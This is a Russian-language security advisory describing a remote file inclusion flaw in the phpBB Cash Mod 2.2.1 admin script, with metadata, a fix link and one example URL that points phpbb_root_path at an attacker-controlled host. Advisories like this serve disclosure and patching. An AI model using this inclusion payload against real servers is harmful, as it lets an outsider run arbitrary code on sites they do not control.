php инклудинг в phpBB

Дата публикации:
19.11.2004
Дата изменения:
20.10.2006
Всего просмотров:
4302
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: phpBB Cash Mod 2.2.1

Описание:
Уязвимость обнаружена в модуле Cash Mod в phpBB. Удаленный атакующий может выполнить произвольные команды на уязвимой системе.

Уязвимость обнаружена в файле '/admin/admin_cash.php'. Удаленный атакующий может выполнить произвольный php сценарий на уязвимой системе. Пример:

http://[target]/phpBB2/admin/admin_cash.php?setmodules=1&phpbb_root_path=http://[attacker]/

URL производителя: xore.ca/viewforum.php?f=2

Решение: Установите обновление: http://www.phpbb.com/phpBB/catdb.php?mode=download&id=539420

Ссылки: phpBB Cash Mod Include File Error Lets Remote Users Execute Arbitrary Code

или введите имя

CAPTCHA